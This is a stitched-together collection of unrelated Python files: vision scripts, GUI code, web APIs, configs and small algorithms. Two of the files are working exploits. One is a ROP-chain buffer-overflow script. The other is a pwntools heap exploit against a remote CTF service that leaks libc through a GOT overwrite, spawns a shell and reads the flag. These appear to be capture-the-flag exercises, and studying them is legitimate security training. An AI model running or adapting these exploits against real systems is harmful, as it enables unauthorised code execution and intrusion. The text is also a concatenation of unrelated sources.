def crossline(curr, prev, length):
diff = curr - prev
if diff[1] == 0:
p1 = (int(curr[1]), int(curr[0] - length / 2))
p2 = (int(curr[1]), int(curr[0] + length / 2))
else:
slope = -diff[0] / diff[1]
x = np.cos(np.arctan(slope)) * length / 2
y = slope * x
p1 = (int(curr[1] - y), int(curr[0] - x))
p2 = (int(curr[1] + y), int(curr[0] + x))
return p1, p2
def draw_path(frame, path, color):
if path.shape[0] > 0:
prev = path[0]
for curr in path[1:]:
loc1 = (int(prev[1]), int(prev[0])) # (y, x)
loc2 = (int(curr[1]), int(curr[0])) # (y, x)
p1, p2 = crossline(curr, prev, 3)
cv2.line(frame, p1, p2, color, 1, cv2.LINE_AA)
cv2.line(frame, loc1, loc2, color, 1, cv2.LINE_AA)
prev = curr
def draw_waypoints(frame, points, color):
for loc in ((int(y), int(x)) for x, y, z in points):
cv2.circle(frame, loc, 3, color, -1, cv2.LINE_AA)
def create_obstacle_map(map_png):
raw_map = np.array(Image.open(map_png))
return raw_map
# ignored_peds = [171, 216]
ignored_peds = []
def to_pixels(Hinv, loc):
"""
Given H^-1 and (x, y, z) in world coordinates, returns (c, r) in image
pixel indices.
"""
loc = to_image_frame(Hinv, loc).astype(int)
return loc[1], loc[0]
def to_image_frame(Hinv, loc):
"""
Given H^-1 and (x, y, z) in world coordinates, returns (u, v, 1) in image
frame coordinates.
"""
if loc.ndim > 1:
loc_tr = np.transpose(loc)
loc_tr = np.matmul(Hinv, loc_tr) # to camera frame
return np.transpose(loc_tr/loc_tr[2]) # to pixels (from millimeters)
else:
loc = np.dot(Hinv, loc) # to camera frame
return loc / loc[2] # to pixels (from millimeters)
def create_obstacle_map(map_png):
raw_map = np.array(Image.open(map_png))
return raw_map
def parse_annotations(Hinv, obsmat_txt):
mat = np.loadtxt(obsmat_txt)
num_frames = int(mat[-1, 0] + 1)
num_times = np.unique(mat[:, 0]).size
num_peds = int(np.max(mat[:, 1])) + 1
frames = [-1] * num_frames # maps frame -> timestep
timeframes = [-1] * num_times # maps timestep -> (first) frame
timesteps = [[] for _ in range(num_times)] # maps timestep -> ped IDs
peds = [np.array([]).reshape(0, 4) for _ in range(num_peds)] # maps ped ID -> (t,x,y,z) path
frame = 0
time = -1
for row in mat:
if row[0] != frame:
frame = int(row[0])
time += 1
frames[frame] = time
timeframes[time] = frame
ped = int(row[1])
if ped not in ignored_peds: # TEMP HACK - can cause empty timesteps
timesteps[time].append(ped)
loc = np.array([row[2], row[4], 1])
# loc = util.to_image_frame(Hinv, loc)
loc = [time, loc[0], loc[1], loc[2]] # loc[0], loc[1] should be img coords, loc[2] always "1"
peds[ped] = np.vstack((peds[ped], loc))
return frames, timeframes, timesteps, peds
def main():
disp = Display('/home/jamirian/workspace/crowd_sim/tests/eth')
disp.plot_ped()
# ============== SET FRAME ==================
time_length = 30.0
fps = 25
frame_seq = 749
frame_no = (frame_seq / (time_length * fps))
# The first argument of cap.set(), number 2 defines that parameter for setting the frame selection.
# Number 2 defines flag CV_CAP_PROP_POS_FRAMES which is a 0-based index of the frame to be decoded/captured next.
# The second argument defines the frame number in range 0.0-1.0
|
#!/usr/bin/python2
import os
import struct # This module performs conversions between Python
# values and C structs represented as Python strings.
# It uses Format Strings as compact descriptions of the layout
# of the C structs and the intended conversion to/from Python values.
# Gadgets found with Ropper
pop_ret = 0x0804848e
pop_pop_ret = 0x0804848d
# Addresses of functions found using gdb.
add_bin = 0x8048454
add_sh = 0x8048490
exec_command = 0x804843b
payload = "A"*0x6c
payload += "BBBB"
# "I" is the format for unsigned integer
payload += struct.pack("I", add_bin)
payload += struct.pack("I", pop_ret)
payload += struct.pack("I", 0xdeadbeef)
payload += struct.pack("I", add_sh)
payload += struct.pack("I", pop_pop_ret)
payload += struct.pack("I", 0xcafebabe)
payload += struct.pack("I", 0x8badf00d)
payload += struct.pack("I", exec_command)
os.system("./chaining_func \"%s\"" % payload)
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'untitled.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
from MakeData import MakeData
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(800, 600)
self.shuf = []
self.market = []
self.ramilevi = []
self.product_shufersal = [] # for the items
self.product_market = [] # for the items
self.product_ramilevi = []
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.comboBox1 = QtWidgets.QComboBox(self.centralwidget)
self.comboBox1.setGeometry(QtCore.QRect(518, 81, 191, 21))
self.comboBox1.setObjectName("comboBox1")
self.comboBox_2 = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_2.setGeometry(QtCore.QRect(248, 82, 191, 20))
self.comboBox_2.setObjectName("comboBox_2")
self.comboBox_3 = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_3.setGeometry(QtCore.QRect(10, 80, 181, 21))
self.comboBox_3.setObjectName("comboBox_3")
self.calcbtn = QtWidgets.QPushButton(self.centralwidget)
self.calcbtn.setGeometry(QtCore.QRect(320, 510, 141, 41))
self.calcbtn.setObjectName("calcbtn")
self.add1 = QtWidgets.QPushButton(self.centralwidget)
self.add1.setGeometry(QtCore.QRect(720, 80, 31, 23))
self.add1.setObjectName("add2_2")
self.add3 = QtWidgets.QPushButton(self.centralwidget)
self.add3.setGeometry(QtCore.QRect(200, 80, 31, 23))
self.add3.setObjectName("add3")
self.add2 = QtWidgets.QPushButton(self.centralwidget)
self.add2.setGeometry(QtCore.QRect(450, 80, 31, 23))
self.add2.setObjectName("add2")
self.label_1 = QtWidgets.QLabel(self.centralwidget)
self.label_1.setGeometry(QtCore.QRect(590, 110, 201, 331))
self.label_1.setObjectName("label_1")
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setGeometry(QtCore.QRect(300, 120, 201, 311))
self.label_2.setObjectName("label_2")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setGeometry(QtCore.QRect(30, 120, 201, 321))
self.label_3.setObjectName("label_3")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(260, 10, 371, 51))
self.label_1.clear()
self.label_2.clear()
self.label_3.clear()
font = QtGui.QFont()
font.setPointSize(18)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName("label")
self.price1 = QtWidgets.QLabel(self.centralwidget)
self.price1.setGeometry(QtCore.QRect(580, 460, 171, 41))
self.price1.setObjectName("price1")
self.price2 = QtWidgets.QLabel(self.centralwidget)
self.price2.setGeometry(QtCore.QRect(300, 460, 171, 41))
self.price2.setObjectName("price2")
self.price3 = QtWidgets.QLabel(self.centralwidget)
self.price3.setGeometry(QtCore.QRect(20, 460, 171, 41))
self.price3.setObjectName("price3")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.manageComboBox()
self.add1.clicked.connect(self.add1Func)
self.add2.clicked.connect(self.add2Func)
self.add3.clicked.connect(self.add3Func)
self.calcbtn.clicked.connect(self.calc)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.calcbtn.setText(_translate("MainWindow", "Calculate"))
self.add1.setText(_translate("MainWindow", "Add"))
self.add3.setText(_translate("MainWindow", "Add"))
self.add2.setText(_translate("MainWindow", "Add"))
self.label_1.setText(_translate("MainWindow", "TextLabel"))
self.label_2.setText(_translate("MainWindow", "TextLabel"))
self.label_3.setText(_translate("MainWindow", "TextLabel"))
self.label.setText(_translate("MainWindow", "Prices comparing"))
self.price1.setText(_translate("MainWindow", "Shufersal price:"))
self.price2.setText(_translate("MainWindow", "Storage market price:"))
self.price3.setText(_translate("MainWindow", "Rami levi price:"))
def manageComboBox(self):
maker = MakeData()
maker.makeAll()
for i in range(len(maker.data_shufersal)):
self.shuf.append(maker.data_shufersal[i])
self.comboBox1.addItem(maker.data_shufersal[i].product_name)
for j in range(len(maker.data_market)):
self.market.append(maker.data_market[j])
self.comboBox_2.addItem(maker.data_market[j].product_name)
for k in range(len(maker.data_ramilevi)):
self.ramilevi.append((maker.data_ramilevi[k]))
self.comboBox_3.addItem(maker.data_ramilevi[k].product_name)
def add1Func(self):
text = str(self.comboBox1.currentText())
all_text = self.label_1.text() + "\n" + text
self.label_1.setText(all_text)
for i in range(len(self.shuf)):
if (self.comboBox1.currentText() == self.shuf[i].product_name):
self.product_shufersal.append(self.shuf[i])
def add2Func(self):
text = str(self.comboBox_2.currentText())
all_text = self.label_2.text() + "\n" + text
self.label_2.setText(all_text)
for i in range(len(self.market)):
if (self.comboBox_2.currentText() == self.market[i].product_name):
self.product_market.append(self.market[i])
def add3Func(self):
text = str(self.comboBox_3.currentText())
all_text = self.label_3.text() + "\n" + text
self.label_3.setText(all_text)
for i in range(len(self.ramilevi)):
if (self.comboBox_3.currentText() == self.ramilevi[i].product_name):
self.product_ramilevi.append(self.ramilevi[i])
def calc(self):
shuf_total = 0
market_total = 0
ramilevi_total = 0
for i in range(len(self.product_shufersal)):
shuf_total += float(self.product_shufersal[i].price)
for j in range(len(self.product_market)):
market_total += float(self.product_market[j].price)
for k in range(len(self.product_ramilevi)):
ramilevi_total += float(self.product_ramilevi[k].price)
self.price1.clear()
self.price1.setText("Shufersal price : " + str(shuf_total))
self.price2.clear()
self.price2.setText("Storage market price : " + str(market_total))
self.price3.clear()
self.price3.setText("Rami Levi price : " + str(ramilevi_total))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
'''
Created on Nov 8, 2016
@author: micro
'''
import cv2
import numpy as np
cap = cv2.VideoCapture(0)
while True:
ret, frame = cap.read() #ret is true or false
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
cv2.imshow("frame",frame)
cv2.imshow("gray",gray)
if cv2.waitKey(1) & 0xFF == ord("q"):
break
cap.release()
cv2.destroyAllWindows() |
import math
from phi.torch.flow import *
net = invertible_net(1, 3, True, 'u_net', 'SiLU')
optimizer = adam(net, learning_rate=1e-3)
print(parameter_count(net))
def loss_function(smoothness: Tensor):
grid = CenteredGrid(Noise(smoothness=smoothness), x=8, y=8)
pred_smoothness = field.native_call(net, grid)
return math.l2_loss(pred_smoothness - smoothness)
gt_smoothness = math.random_uniform(batch(examples=10), low=0.5, high=1)
viewer = view(gui='dash', scene=True)
for i in viewer.range():
if i > 100: break
loss = update_weights(net, optimizer, loss_function, gt_smoothness)
if i % 10 == 0: print(f'Iter : {i}, Loss : {loss}')
viewer.log_scalars(loss=loss)
grid = CenteredGrid(Noise(scale=1.0, smoothness=gt_smoothness), x=8, y=8)
pred = field.native_call(net, grid, False)
reconstructed_input = field.native_call(net, pred, True)
print('Loss between Predicted Tensor and original grid', math.l2_loss(pred - grid))
print('Loss between Predicted Tensor and GT tensor', math.l2_loss(pred - gt_smoothness))
print('Loss between Reconstructed Input and original grid:', math.l2_loss(reconstructed_input - grid))
|
from heapq import heappush, heappop
from random import randint
def heap_sort(array):
h = []
for i in array:
heappush(h, i)
for i in range(len(h)):
array[i] = heappop(h)
def main():
a = []
for i in range(10000000):
s = randint(0, 10000000)
a.append(s)
print(a)
heap_sort(a)
print(a)
if __name__ == '__main__':
main()
|
import pandas as pd
import random
from openpyxl import load_workbook
import numpy as np
import sys
def read_data(path=None, sheet_name="Sheet1", input_num=101, label_num=40, mode="train"):
"""
从xlsx文件读取数据
:param path: 文件路径
:param sheet_name: 表单名
:return: 返回样本输入与标签(测试数据标签为空)
"""
if path is None:
print("请输入文件路径!")
sys.exit()
df = pd.read_excel(path, header=None, sheet_name=sheet_name) # 读取数据
df = df.values # 将数据转换为numpy数组
# 判断为训练
# 数据还是测试数据
if mode is "train":
assert input_num + label_num == np.shape(df)[1] #读取样本的总维度跟input_num + label_num不一致会报错
data_inputs = df[:, :input_num] # 切片,样本输入数据
data_labels = df[:, input_num:] # 切片,样本标签数据
else:
assert input_num == np.shape(df)[1] #读取样本的维度跟input_num不一致会报错
data_inputs = df[:, :] # 切片,样本输入数据
data_labels = None # 切片,样本标签数据
return data_inputs, data_labels
def write_data(data, path=None, sheet_name=1):
"""
将结果输出到xlsx文件中
:param path:
:param sheet_name:
"""
if path is None:
print("请输入文件路径!")
sys.exit()
df = pd.read_excel(path, header=None, sheet_name=sheet_name) # 读取数据
df = df.values # 将数据转换为numpy数组
data_df = pd.DataFrame(np.concatenate((df, np.array(data)), axis=1))
writer = pd.ExcelWriter(path)
data_df.to_excel(writer, sheet_name=sheet_name, header=None, index=None)
writer.save()
print("结果已保存!")
def generate_batch(data_inputs, data_labels, batch_size=32):
"""
生成训练用的batch样本
:param data_inputs: 样本输入
:param data_labels: 样本标签
:return: 使用迭代器返回训练数据
"""
# 随机生成batch_size大小的数据
slice = random.sample(range(len(data_inputs)), batch_size)
x_batch = data_inputs[slice]
y_batch = data_labels[slice]
y_one_hot = slice
yield x_batch, y_batch, y_one_hot
if __name__ == '__main__':
read_data(path='data/54.xlsx')
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
from handlers.service.UserService import UserService
class UserHandler:
def getUsersByDeptid(self, deptid):
userService = UserService()
result = userService.getUsersByDeptid(deptid)
return result
|
# -*- coding: UTF-8 -*
data = {
"station_train_code": '',
"from_station_name": '',
"to_station_name": '',
'start_time': '',
'end': '',
"lishi": '',
"swz_num": '',
"zy_num": '',
"ze_num": '',
"dw_num": '',
"gr_num": '',
"rw_num": '',
"yw_num": '',
"rz_num": '',
"yz_num": '',
"wz_num": '',
"qt_num": '',
"note_num": ''
}
name = [
"station_train_code",
"from_station_name",
'start_time',
"lishi",
"swz_num",
"zy_num",
"ze_num",
"gr_num",
"rw_num",
"dw_num",
"yw_num",
"rz_num",
"yz_num",
"wz_num",
"qt_num",
"note_num"
]
info = {
'from_station': '',
'to_station': '',
'from_date': ''
}
pricesDic = {
'A': '',
'B': '',
'C': '',
'D': '',
'E': '',
'F': '',
'G': '',
'H': '',
'I': '',
'J': ''
}
priceName = [
"swz_num",
"dw_num",
"zy_num",
"ze_num",
"gr_num",
"rw_num",
"yw_num",
"rz_num",
"yz_num",
"wz_num"
]
|
import contextlib
from pathlib import (
Path,
)
import pytest
from lll.parser import (
parse_s_exp,
)
FIXTURES_PATH = Path(__file__).parent / 'fixtures'
UNPARSEABLE_FIXTURES_PATH = FIXTURES_PATH / 'unparseable'
FIXTURES = list(sorted(FIXTURES_PATH.glob('*.lisp')))
UNPARSEABLE_FIXTURES = list(sorted(UNPARSEABLE_FIXTURES_PATH.glob('*.lisp')))
def get_fixture_path_id(path: Path) -> str:
return str(path.resolve())
@contextlib.contextmanager
def _open_fixture_file(filename, *args):
fixture_path = FIXTURES_PATH / filename
with open(fixture_path, *args) as f:
yield f
def _get_fixture_contents(filename):
with _open_fixture_file(filename, 'r') as f:
return f.read()
@pytest.fixture(
params=FIXTURES,
ids=get_fixture_path_id,
)
def parseable_lll_file(request):
return request.param
@pytest.fixture(
params=UNPARSEABLE_FIXTURES,
ids=get_fixture_path_id,
)
def unparseable_lll_file(request):
return request.param
@pytest.fixture
def open_fixture_file():
return _open_fixture_file
@pytest.fixture
def get_fixture_contents():
return _get_fixture_contents
@pytest.fixture
def get_parsed_fixture():
def _get_parsed_fixture(filename):
return parse_s_exp(_get_fixture_contents(filename))
return _get_parsed_fixture
|
from pwn import *
import time
import sys
def alloc(ind, size, data):
proc.sendlineafter(b': ', b'1')
proc.sendlineafter(b':', f'{ind}'.encode())
proc.sendlineafter(b':', f'{size}'.encode())
proc.sendafter(b':', data)
def realloc(ind, size, data):
proc.sendlineafter(b': ', b'2')
proc.sendlineafter(b':', f'{ind}'.encode())
proc.sendlineafter(b':', f'{size}'.encode())
proc.sendafter(b':', data)
def realloc_free(ind):
proc.sendlineafter(b': ', b'2')
proc.sendlineafter(b':', f'{ind}'.encode())
proc.sendlineafter(b':', b'0')
def free(ind):
proc.sendlineafter(b': ', b'3')
proc.sendlineafter(b':', f'{ind}'.encode())
def exit():
proc.sendlineafter(b': ', b'4')
def printf(buf):
proc.sendlineafter(b': ', b'3')
proc.sendafter(b':', buf)
def overlap(size):
for i in range(7):
alloc(0, 0x18, b'A')
realloc(0, size, b'A')
free(0)
alloc(0, 0x18, b'A')
realloc(0, size, b'A')
alloc(1, 0x18, b'A')
realloc(1, size, b'A')
realloc_free(0)
free(1)
free(0)
for i in range(7):
alloc(0, size, b'A')
realloc(0, 0x18, b'A')
free(0)
def set_target(size, target):
alloc(0, size, p64(target))
for i in range(size - 0x20, 0, -0x20):
realloc(0, i, p64(target))
for i in range(2):
alloc(1, size, b'A')
for j in range(size - 0x20, 0, -0x20):
realloc(1, j, b'A')
free(1)
free(0)
def exploit():
if len(sys.argv) <= 1:
input('attach to pid: {}'.format(proc.proc.pid))
atoll_got = 0x404048
printf_plt = 0x401076
overlap(0x58)
overlap(0x78)
for i in range(7):
alloc(0, 0x58, b'A')
realloc(0, 0x18, b'A')
free(0)
set_target(0x58, atoll_got)
set_target(0x78, atoll_got)
alloc(0, 0x58, flat(printf_plt))
printf("%p|%p|%p>>>")
libc = proc.recvuntil(b'>>>').split(b'|')[2]
libc = int(libc[:-3], 16)
if len(sys.argv) <= 1:
# local
libc -= 0x101ac9
system = libc + 0x41c50
else:
# remote
libc -= 0x12e009
system = libc + 0x52fd0
log.info('libc: ' + hex(libc))
# alloc(1, 0x78, p64(system))
proc.sendlineafter(b': ', b'1')
proc.sendafter(b':', b'A' * 1)
proc.sendafter(b':', b'%120p')
proc.sendafter(b':', p64(system))
proc.sendlineafter(b': ', b'1')
proc.sendlineafter(b':', b'/bin/sh')
proc.sendline(b'cat /home/re-alloc/flag')
# FLAG{Heeeeeeeeeeeeeeeeeeeeeee4p}
if __name__ == '__main__':
context.arch = 'amd64'
connect = 'nc eductf.zoolab.org 10106'
connect = connect.split(' ')
if len(sys.argv) > 1:
proc = remote(connect[1], int(connect[2]))
else:
proc = process(['./re-alloc'])
exploit()
proc.interactive()
|
#!/usr/bin/python3
'''
Package initializer
'''
from models.base_model import BaseModel
from models.country import Country
from models.city import City
from models.trip import Trip
from models.user import User
from models.notification import Notification
from models.continent import Continent
from os import getenv
from models.engine.db_storage import DBStorage
classes = {"BaseModel": BaseModel, "Country": Country,
"City": City, "Trip": Trip, "User": User,
"Notification": Notification, "Continent": Continent}
storage = DBStorage()
|
# Simulation
RANDOM_SEED = 42
TRAFFIC_LOAD_NUM = 20
TRAFFIC_LOAD_START = 10
TRAFFIC_LOAD_END = 3000
SIMULATIONS_PER_MODEL = 100
# Grid
GRID_WIDTH = 10
GRID_HEIGHT = 10
# Road
ROAD_PROBABILITY = .9 # The probability of an intersection being connected to a neighbouring one (one-directional)
ROAD_LENGTH_BASE = 1 # The number of steps it takes to travel a road
ROAD_LENGTH_DIFF = 85*[0] + 10*[+1] + 5*[+2]
# Lane
LANE_PROBABILITY = .9 # The probability of a lane at the end of a road
TRAFFIC_LIGHT_LENGTH = 1 # How many steps a traffic light will be GREEN
FLOW_THROUGH_BASE = 8 # The number of vehicles that can drive in one step when a light turns GREEN
FLOW_THROUGH_DIFF = 5*[+1] + 80*[0] + 10*[-1] + 5*[-2]
# Vehicle
VEHICLE_MIN_ROADS = (GRID_WIDTH+GRID_HEIGHT) // 2
VEHICLE_MAX_ROADS = (GRID_WIDTH+GRID_HEIGHT) * 2
# Results
RESULTS_FOLDER_PATH = './results/'
def to_string():
return "spm={}, " \
"w={}, " \
"h={}, " \
"r_base={}, " \
"t={}, " \
"f_base={}" \
.format(SIMULATIONS_PER_MODEL, GRID_WIDTH, GRID_HEIGHT, ROAD_LENGTH_BASE, TRAFFIC_LIGHT_LENGTH, FLOW_THROUGH_BASE)
|
from libs.auth import Auth
from config import APP_URL, LOG, USER, PASSWORD
def test_login():
LOG.info("test_login")
response = Auth().login(APP_URL, USER, PASSWORD)
LOG.debug(response.json())
assert response.ok
assert response.status_code == 200
|
def remove_url_anchor(url):
if url.count("#") == 1:
url = url[:url.index("#")]
return url |
def SubsetSum (N , s) :
global arr , dp
for i in range (N + 1) :
for j in range(s + 1) :
if (j == 0 ) :
dp[i][j] = 1
elif (i == 0) and (j != 0) :
dp[i][j] = 0
else :
dp[i][j] = dp[i-1][j] + dp[i-1][j - arr[i-1]]
def Count(T) :
global dp,s
for i in range (s//2 + 1) :
if (s - 2*i == T) :
print(dp[-1][i])
break
else :
print(0)
N = int(input("Enter size : "))
arr = list(map(int , input().split()))
T = int(input("TargetSum : "))
s = sum(arr)
dp = [[0 for i in range (s//2 + 1)] for j in range(N+1)]
SubsetSum(N,s//2)
Count(T)
|
numero = int(input("digite um numero: "))
calculo = numero%3
if calculo == 0 :
print("Fizz")
else:
print(numero)
|
from rest_framework import viewsets
from .models import Article
from .serializerModel import ArticlesSerializer
from rest_framework.response import Response
from django.shortcuts import get_object_or_404
from rest_framework import status
class ArticleViewset(viewsets.ViewSet):
def list(self, request):
queryset = Article.objects.all()
serializer = ArticlesSerializer(queryset, many=True)
return Response(serializer.data)
def retrieve(self, request, pk=None):
queryset = request.objects.all()
article = get_object_or_404(queryset, pk=pk)
serializer = ArticlesSerializer(article)
return Response(serializer.data)
def create(self, request):
serilizer = ArticlesSerializer(request.data)
if serilizer.is_valid():
serilizer.save()
return Response(serilizer.data, status.HTTP_200_OK)
return Response(serilizer.errors,status.HTTP_400_BAD_REQUEST)
def update(self,request,pk=None):
queryset = request.objects.all()
articl = get_object_or_404(queryset,pk=pk)
serilizer = ArticlesSerializer(articl,request.data)
serilizer.save()
# def delete(self,request,pk=None):
|
from pony import orm
db = orm.Database()
# Define animals table
class Animal(db.Entity):
id = orm.PrimaryKey(int, auto=True)
name = orm.Required(str)
age = orm.Required(int)
# Create add animal function
@orm.db_session
def add_animal(name:str,age:str):
Animal(name=name,age=age)
|
from rest_framework.decorators import action
import secrets
from rest_framework.response import Response
from rest_framework import status, mixins, viewsets
from rest_framework.authentication import TokenAuthentication
from rest_framework.permissions import IsAuthenticated
from core.models import Device, Audience, Advertising
from advertising import serializers
class DeviceViewSet(viewsets.GenericViewSet, mixins.ListModelMixin, mixins.CreateModelMixin):
"""Manage devices in the database"""
queryset = Device.objects.all()
serializer_class = serializers.DeviceSerializer
authentication_classes = (TokenAuthentication,)
permission_classes = (IsAuthenticated,)
def get_queryset(self):
return self.queryset.filter(user=self.request.user).order_by('-name')
def perform_create(self, serializer):
serializer.save(user=self.request.user, key=secrets.token_urlsafe(16))
class AudienceViewSet(viewsets.GenericViewSet, mixins.ListModelMixin, mixins.CreateModelMixin):
"""Manage audiences in the database"""
queryset = Audience.objects.all()
serializer_class = serializers.AudienceSerializer
authentication_classes = (TokenAuthentication,)
permission_classes = (IsAuthenticated,)
def get_queryset(self):
return self.queryset.order_by('-name')
def perform_create(self, serializer):
serializer.save()
class AdvertisingViewSet(viewsets.ModelViewSet):
"""Manage advertising in the database"""
serializer_class = serializers.AdvertisingSerializer
queryset = Advertising.objects.all()
authentication_classes = (TokenAuthentication,)
permission_classes = (IsAuthenticated,)
def _params_to_ints(self, qs):
"""Convert a list of string IDs to a list of integers"""
return [int(str_id) for str_id in qs.split(',')]
def get_serializer_class(self):
"""Return appropriate serializer class"""
if self.action == 'retrieve':
return serializers.AdvertisingDetailSerializer
if self.action == 'upload_image':
return serializers.AdvertisingImageSerializer
return self.serializer_class
def get_queryset(self):
"""Retrieve the advertising for the authenticated user"""
devices = self.request.query_params.get('devices')
audiences = self.request.query_params.get('audiences')
queryset = self.queryset
if devices:
devices_ids = self._params_to_ints(devices)
queryset = queryset.filter(tags__id__in=devices)
if audiences:
audiences_ids = self._params_to_ints(audiences)
queryset = queryset.filter(ingredients__id__in=audiences_ids)
return queryset.filter(user=self.request.user)
def perform_create(self, serializer):
serializer.save(user=self.request.user)
@action(methods=['POST'], detail=True, url_path='upload-image')
def upload_image(self, request, pk=None):
"""Upload an image to an advertising"""
advertising = self.get_object()
serializer = self.get_serializer(
advertising,
data=request.data
)
if serializer.is_valid():
serializer.save()
return Response(
serializer.data,
status=status.HTTP_200_OK
)
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
|
from scapy.all import *
import numpy as np
it = 0
time = 1
size = 0
flow_window = np.zeros(60//time)
def get_traffic_size_per_minute():
return flow_window.sum()
def traffic_monitor_callbak(pkt):
global size
if IP in pkt:
size = size + int(pkt.sprintf("%IP.len%"))
def timeout(time=time):
global it
global size
size = 0
sniff(prn=traffic_monitor_callbak, store=0, timeout=time)
flow_window[it] = size
it = (it + 1) % (flow_window.shape[0])
print(get_traffic_size_per_minute()) # comment it
timeout(time)
timeout(time)
|
from django.forms import ModelForm
from django import forms
from .models import category, gif
class GifForm(ModelForm):
class Meta:
model = gif
fields = ['uploader_name', 'title', 'url']
class CategoriesForm(ModelForm):
class Meta:
model = category
fields = ['name', 'gifs']
# GifForm
# uploader_name
# title
# url
|
from songs.models import Song, ArtistContribution, BandContribution
from django.contrib import admin
class ArtistContributionInline(admin.TabularInline):
model = ArtistContribution
extra = 1
class BandContributionInline(admin.TabularInline):
model = BandContribution
extra = 1
class SongAdmin(admin.ModelAdmin):
inlines = (ArtistContributionInline,BandContributionInline,)
prepopulated_fields = { 'slug' : ['title', 'disambig'] }
fieldsets = [
('Identification', {'fields': ['title', 'original_title', 'disambig', 'slug', 'published']}),
('Content', {'fields': ['capo_fret', 'lyrics',]}),
('Additional', {'fields': ['link_youtube', 'link_wrzuta', 'score1', 'score2', 'score3']}),
]
admin.site.register(Song, SongAdmin)
|
from flask import Flask, request, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
from flask_marshmallow import Marshmallow
from flask_heroku import Heroku
import os
app = Flask(__name__)
heroku = Heroku(app)
basedir = os.path.abspath(os.path.dirname(__file__))
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + \
os.path.join(basedir, "app.sqlite")
CORS(app)
db = SQLAlchemy(app)
ma = Marshmallow(app)
class User(db.Model):
__tablename__ = "users"
id = db.Column(db.Integer, primary_key=True)
image = db.Column(db.String(), nullable=False)
name = db.Column(db.String(), unique=True, nullable=False)
description = db.Column(db.String(420), nullable=True)
def __init__(self, image, name, description):
self.image = image
self.name = name
self.description = description
class UserSchema(ma.Schema):
class Meta:
fields = ("id", "image", "name", "description")
user_schema = UserSchema()
users_schema = UserSchema(many=True)
@app.route("/add-user", methods=["POST"])
def add_user():
image = request.json["image"]
name = request.json["name"]
description = request.json["description"]
record = User(image, name, description)
db.session.add(record)
db.session.commit()
user = User.query.get(record.id)
return user_schema.jsonify(user)
@app.route("/turpentine", methods=["GET"])
def get_all_users():
all_users = User.query.all()
result = users_schema.dump(all_users).data
return jsonify(result)
@app.route("/turpentine/<id>", methods=["GET"])
def get_user_by_name(id):
record = User.query.get(id)
return user_schema.jsonify(record)
@app.route("/edit/<id>", methods=["PUT"])
def edit_user(id):
record = User.query.get(id)
new_image = request.json["image"]
new_name = request.json["name"]
new_description = request.json["description"]
record.image = new_image
record.name = new_name
record.description = new_description
db.session.commit()
return user_schema.jsonify(record)
@app.route("/delete/<id>", methods=["DELETE"])
def delete_user(id):
record = User.query.get(id)
db.session.delete(record)
db.session.commit()
return f"Successfully deleted profile #{id}"
if __name__ == "__main__":
app.debug = True
app.run()
|
from .webdriver import WebDriverMixin
|
# coding: utf-8
# In[419]:
import numpy as np
import sys
if "../" not in sys.path:
sys.path.append("../")
from lib.envs.halften import HalftenEnv
# 这个函数主要用来测试环境使用
# In[420]:
env = HalftenEnv()
content = ["爆牌","平牌","十点半","五小","天王","天五小"]
# In[422]:
def print_observation(observation):
score, card_num, p_num = observation
print("玩家分数: {} (手牌数: {},人牌数: {})".format(
score, card_num, p_num))
# 策略为随机策略,当前分数大于等于10时则停止叫牌
def strategy(observation):
score, card_num,p_num = observation
return 0 if score >= 10 else 1
for i_episode in range(20):
observation = env._reset()
for t in range(100):
print_observation(observation)
action = strategy(observation)
print("采取的行为: {}".format( ["停牌", "叫牌"][action]))
observation, reward, done, _ = env._step(action)
if done:
print_observation(observation)
print("游戏结束,回报: {}\n".format(float(reward)))
print("*"*50)
break
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__version__ = '1.0.1'
import ujson
from decimal import Decimal
from sanic.log import logger
from sanic.request import Request
# IMPORT HW ACTION SPECIFICATIONS
from .specification.get_hw_action_specification import (
get_hw_action_list_query, get_hw_action_list_count_query,
get_hw_action_element_query, get_hw_action_list_user_type_query
)
from .specification.delete_hw_action_specification import delete_hw_action_element_query
from .specification.update_hw_action_specification import update_hw_action_element_query
from .specification.create_hw_action_specification import create_hw_action_element_query
__all__ = [
# SERVICES WORKING ON HW ACTION TABLE
'get_hw_action_list', 'get_hw_action_list_count', 'get_hw_action_element',
'get_hw_action_list_user_type', 'create_hw_action_element', 'update_hw_action_element',
'delete_hw_action_element'
]
# HW ACTION SERVICES
async def get_hw_action_list(
request: Request,
name: object = None,
action_type: object = None,
limit: int = 0,
offset: int = 0) -> list:
""" Get hw_action list ordered by hw_action id desc.
:param request:
:param name:
:param action_type:
:param limit:
:param offset:
:return:
"""
ret_val = []
